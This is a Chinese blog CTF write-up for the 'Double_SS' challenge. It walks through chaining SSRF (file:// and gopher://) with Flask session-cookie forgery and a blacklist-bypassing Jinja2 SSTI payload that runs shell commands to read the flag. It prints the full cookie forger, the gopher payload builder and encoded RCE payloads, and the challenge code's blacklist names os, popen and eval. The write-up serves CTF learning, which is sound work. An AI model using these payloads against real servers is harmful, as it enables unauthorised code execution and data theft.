2023PCTF Double_SS

最新推荐文章于 2024-01-28 21:36:07 发布
最新推荐文章于 2024-01-28 21:36:07 发布
阅读量413 收藏 8
点赞数 10
分类专栏: BUUctf 文章标签: ssti ssrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134851662
版权

记录一下 ssrf配合 ssti的结合

首先开启环境 明显的ssrf

 让我们访问 5555端口

使用http协议访问

url=127.0.0.1:5555

 告诉我们去访问 name 并且给我们key

url=127.0.0.1:5555/name

出现报错 说我们不是admin

然后我们往下看

我们使用file协议读取app/app.py

url=file:///app/app.py

 然后美化一下

from flask import Flask, request, session, render_template_string
from flask import redirect, url_for
import uuid

app = Flask(__name__)
app.config['SECRET_KEY'] = str(uuid.uuid4())

@app.route('/', methods=['GET'])
def index():
    res = '''
    You must be the admin to access the /name to SSTI using parameterme
    This is your key {}
    '''.format(app.config['SECRET_KEY'])
    return res

@app.route('/name', methods=['GET'])
def render():
    if session.get('admin') != True:
        return "You must be the admin"

    black_list = ['class', '__global__', 'os', 'popen', 'cat', 'flag', '__init__', 'eval', 'exec', 'bases']
    name = request.args.get('name')

    for item in black_list:
        if item in name:
            return "绕一下nya"

    html_str = '''
    <p>{0}</p>
    '''.format(name)

    return render_template_string(html_str, autoescape=True)

if __name__ == '__main__':
    app.debug = True
    app.run('127.0.0.1', 5555)

查看代码 发现这里存在一个session 的鉴权

需要admin的值为1

然后就开始查看资料

发现 flask 可以通过secret_key 伪造admin

使用下面的代码

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

这里有个问题

网上找到的wp都是存在cookie

但是这道题目没有 所以我们直接构造

{'admin':1}

这里这样写是因为 app.py中只需要 admin=true 所以 admin:1 就是 admin true

然后使用工具

py3 .\flask_session.py encode -s "a71ad490-8d8f-469a-a513-b41a3884ad85" -t "{'admin':1}"

获取到了session

然后这里继续需要 gopher协议传输

import urllib.parse

payload = \
    """GET /name? HTTP/1.1
Host: 127.0.0.1:5555
Cookie: session=eyJhZG1pbiI6MX0.ZXFAYA.V2buNLWHOmXiO9dX08lZHgpd5Bk

    """

# 注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
# print(tmp)
new = tmp.replace('%0A', '%0D%0A')
# print(new)
result = 'gopher://127.0.0.1:5555/' + '_' + new
result = urllib.parse.quote(result)
print(result)  # 这里因为是GET请求所以要进行两次url编码

执行

url=gopher%3A//127.0.0.1%3A5555/_GET%2520/name%253F%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A5555%250D%250ACookie%253A%2520session%253DeyJhZG1pbiI6MX0.ZXEt5Q.1iVKmm6xuIGThpY06HKmmFWqj3Y%250D%250A%250D%250A%2520%2520%2520%2520

出现了 typeerror 这里的报错 通过翻译就可以发现是没有值的迭代


    for item in black_list:
        if item in name:
            return "绕一下nya"

就是这里 因为我们没有传入name 所以这里是没有值的 我们可以开始测试ssti了

存在 然后这里我们看app.py存在waf 但是其实有一个工具直接绕过

GitHub - Marven11/Fenjing: 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 | A Jinja2 SSTI cracker for bypassing WAF

但是这里是存在处理的我们如何执行呢 工具给我们了一个pyhton脚本

from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str): # 如果字符串s可以通过waf则返回True, 否则返回False
    blacklist = [
        'class', '__global__', 'os', 'popen', 'cat', 'flag', '__init__', 'eval', 'exec', 'bases',"\\x6f\\x73","\\u006f\\u0073","\\157\\163"  #这里替换为过滤的内容
    ]
    return all(word not in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "ls%20/")  #需要url编码特殊符号
    #config_payload = config_payload(waf)

    print(f"{shell_payload}")
    #print(f"{config_payload}")

发现 可以输出没被过滤的payload

直接写入 然后打即可

这里发现flag 但是cat被过滤

rce的其他方法都可以

这里选择 nl%20/f*

gopher%3A//127.0.0.1%3A5555/_GET%2520/name%253Fname%253D%257B%257B%2528%2528lipsum.__globals__.__builtins__.__import__%2528%2527so%2527%255B%253A%253A-1%255D%2529%255B%2527p%2527%2527open%2527%255D%2528%2527nl%252520/f%252A%2527%2529%2529.read%2528%2529%2529%257D%257D%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A5555%250D%250ACookie%253A%2520session%253DeyJhZG1pbiI6MX0.ZXFAYA.V2buNLWHOmXiO9dX08lZHgpd5Bk%250D%250A%250D%250A%2520%2520%2520%2520

 这道题挺有意思的 组合拳 主要是你伪造 session需要知道如何伪造

双层小牛堡
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PCTF2016 Web WriteUp
Bendawang's Blog
05-15 5160
PCTF2016 Web WriteUp
采用PCTF技术降低微波/射频器件成本
01-19
射频/微波器件的封装设计非常重要,封装可以保护器件,同时也会影响器件的性能。因此封装一定要能提供优异的电学性能、器件的保护功能和屏蔽作用等等。高性能射频微波器件通常采用陶瓷封装材料,陶瓷材料的介电性能...
PCTF个人题解
Tummyiii的博客
12-08 499
PCTF题解misc流量分析还要加深学习,其他方向后面也会有时间就去接触了。
PCTF 神盾局的秘密
偷一个月亮
09-02 497
http://web.jarvisoj.com:32768/ 文件包含读源码 index.php <?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize(...
PCTF2023
m0_73721944的博客
01-27 962
web Sign In 点开是这样的 鼠标到url的地方然后ctrl+U查看源代码 easyupload 文件上传的题 传一个jpg 抓包后修改文件名为pflag.php flag flag(AD_Qual_DOne_!) 111z_sql 打开就是我们的签到页面 用了现成的脚本,改了一下端口 import requests url = "http://node6.anna.nssctf.cn:28089/copyr
Normal_RSA
→_→
12-07 1210
Normal_RSA(来源:攻防世界) 1.关卡描述 2.解题步骤 分析: 题目,提示使用工具: 得到两个文件: enc文件,得到看不懂的字符 公钥文件 解题: 有两个文件, flag.enc 是经过rsa加密后的密文, pubkey.pem 是rsa的公钥文件 一个加密的,一个是公匙。 目的是利用公钥,算出私钥, 然后再用私钥解加密文件,ok! ================================= 参考链接: 方法一:py2环境安装失败 来自:X
AD无法打开PCB,提示“无法启动此程序,因为计算机中丢失PCTF.DLL。”
Morson35的博客
08-12 2430
AD20正常使用一段时间后,打不开PCB了,原理图可以正常打开。我没有找到直接的解决办法,重新安装后,问题消失。
Jarvis OJ平台basic部分wirteup
weixin_30500663的博客
12-04 367
Base64? 题目描述: GUYDIMZVGQ2DMN3CGRQTONJXGM3TINLGG42DGMZXGM3TINLGGY4DGNBXGYZTGNLGGY3DGNBWMU3WI=== Base32解码得到 504354467b4a7573745f743373745f683476335f66346e7d 貌似是十六进制,hackbar直接转换得到flag ...
jarvisoj_web_witerup
残阳泼茶香的博客
03-17 503
PORT51 该题提示我们需要使用51端口进入该站点 然而此站为http://web.jarvisoj.com:32770/ 它的端口已经是确定了的,所以只能更改我们的port了。 本来用的是kali虚拟机,不能通过外网,命令如下 curl --local-port 51 http://web.jarvisoj.com:32770/ 自己试试,我就懒得弄win上的curl命令了 L...
XCTF:Normal_RSA[WriteUP]
如有错误感谢斧正
01-28 663
pubkey.pem是rsa公钥,加密者利用这个文件对flag原文进行了加密。通过对N值进行分解,获得rsa加密中的关键值:p、q。如果对rsa加密算法不了解的可以补一下教学视频。flag.enc内容是通过rsa加密了的密文。再次利用python帮我们把T的值算出来。手动补齐十六进制头:0x。
pctf.rar_GuestBook
09-24
一个不错的Java guestbook,可以自己在里面添加内容,
wirec0p3:PCTF
02-17
导线sc0p3 设置 列出活动接口: netstat -i 使用tcpdump捕获/过滤流量 sudo tcpdump -i <interface> -s 65535 -w ./out/tcpdump/capture-%s -G 15 -Z $(whoami) python3 ./process_tcpdump.py [,,...] ...
pCTF2015:plaidCTF 2015 的回购
06-11
pCTF2015 plaidCTF 2015 测试 git 的回购
RFID技术中的采用PCTF技术降低微波/射频器件成本
11-07
射频/微波器件的封装设计非常重要,封装可以保护器件,同时也会影响器件的性能。因此封装一定要能提供优异的电学性能、器件的保护功能和屏蔽作用等等。高性能射频微波器件通常采用陶瓷封装材料,陶瓷材料的介电性能...
采用PCTF技术降低微波射频器件成本
10-24
射频/微波器件的封装设计非常重要,封装可以保护器件,同时也会影响器件的性能。因此封装一定要能提供优异的电学性能、器件的保护功能和屏蔽作用等等。
CTF编写
02-15
CTF编写 2020年 大量未完成的求解器; p 0ctf-表情符号,emoji_misc,flash_1 cce-babyshell,simple_cmdshell,simple_pwn,... pctf-emojidb,ipppc,mojo seccon-加密器,kstack,kvdb twctf-RSA,vid 待定
browser-pwn-advent-calendar
05-28
浏览器Pwn出现日历 h # 名称 日期 类型 01 及时更新 渲染器 02 35C3 krautflare 渲染器 03 PCTF格子商店 沙盒逃生
简历模板简洁风简洁干练简历模板简历模板简洁风(简洁干练简历模板).zip
06-17
在求职的征途上,一份出色的简历是你通往梦想职位的敲门砖。我们精心准备了一系列面试求职简历模板,旨在帮助你以最佳形象站在潜在雇主面前。这些简历模板不仅设计精美,而且注重内容的清晰呈现,使招聘经理一目了然地看到你的能力和经验。 我们的模板集合了多种风格与布局,无论你是应届毕业生、职场跳槽者还是行业专家,都能在这里找到适合你职业形象的简历设计。每一个模板都经过精心设计,确保你的简历在众多求职者中脱颖而出,同时保持足够的专业度和可读性。 不仅如此,我们的简历模板易于编辑,你可以根据具体职位需求快速调整内容,展现你的个人优势和职业成就。使用这些模板,将大大提高你的面试机会,并帮助你更好地表达自己的价值和潜力。 别让传统且缺乏创意的简历阻碍你迈向成功的道路。立即下载这些精美的简历模板,让你的求职之路更加顺畅,向心仪的工作迈进吧!记住,一个良好的开始是成功的一半,而一份精致的简历,正是你成功的起点。
Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)
最新发布
06-17
Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)本资源中的源码都是经过本地编译过可运行的,评审分达到95分以上。资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、使用需求,如果有需要的话可以放心下载使用。 Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目) Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型。 Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)Python毕业设计-基于深度学习的水果识别系统的源代码+文档说明+数据集+模型(高分项目)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值